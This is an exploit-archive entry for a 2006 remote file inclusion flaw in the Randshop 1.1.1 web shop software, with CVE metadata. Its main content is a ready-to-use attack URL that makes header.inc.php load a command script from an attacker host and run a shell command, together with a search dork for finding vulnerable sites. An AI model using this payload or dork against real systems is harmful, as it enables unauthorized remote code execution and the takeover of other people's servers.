EXPLOITS

Randshop 1.1.1 - 'header.inc.php' Remote File Inclusion

Author: OLiBekaS
type: webapps
platform: php
port: 
date_added: 2006-06-30  
date_updated:   
verified: 1  
codes: OSVDB-28182;CVE-2006-3375  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 1971.txt  

Title       : randshop <= 1.1.1 Remote File Inclusion Vulnerability
-
URL         : http://www.randshop.com/
-
Author      : OLiBekaS
-
contact     : olibekas[at]gmail.com
-
dork        : "software 2004-2005 by randshop"
-
exploit     : http://[target]/[path]/includes/header.inc.php?dateiPfad=http://[attacker]/cmd.txt?&cmd=ls
-
greatz      : Renzokuzen, skulmatic, sikunYuk, ulga, bigmaster, cgibin, weleh, and all #papmahackerlink crew
-

# milw0rm.com [2006-07-01]